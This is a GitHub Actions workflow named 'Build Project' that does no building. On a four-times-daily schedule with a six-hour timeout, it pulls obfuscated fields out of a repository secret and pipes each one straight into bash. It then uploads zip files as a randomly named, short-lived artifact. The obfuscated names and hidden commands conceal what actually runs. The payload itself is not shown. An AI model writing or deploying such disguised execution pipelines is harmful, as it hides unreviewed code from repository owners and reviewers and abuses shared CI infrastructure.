name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '4 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          a05: ${{ secrets.a05 }}
        run: |
          printf '%s' "$a05" | jq -r .nup41 | /bin/bash
          printf '%s' "$l93" | jq -r .jozh9019 | /bin/bash
          printf '%s' "$tz053" | jq -r .urfrr00393 | /bin/bash
          echo $ahf38 | jq -r .b6 | /bin/bash
          echo $eqmi456 | jq -r .kfapi2 | /bin/bash
          echo $abo4 | jq -r .iwlh53 | /bin/bash
          echo $akq39340 | jq -r .c8094 | /bin/bash
          printf '%s' "$asrpq6578" | jq -r .i384 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: jyO7CakJ
          path: "*.zip"
          retention-days: 1
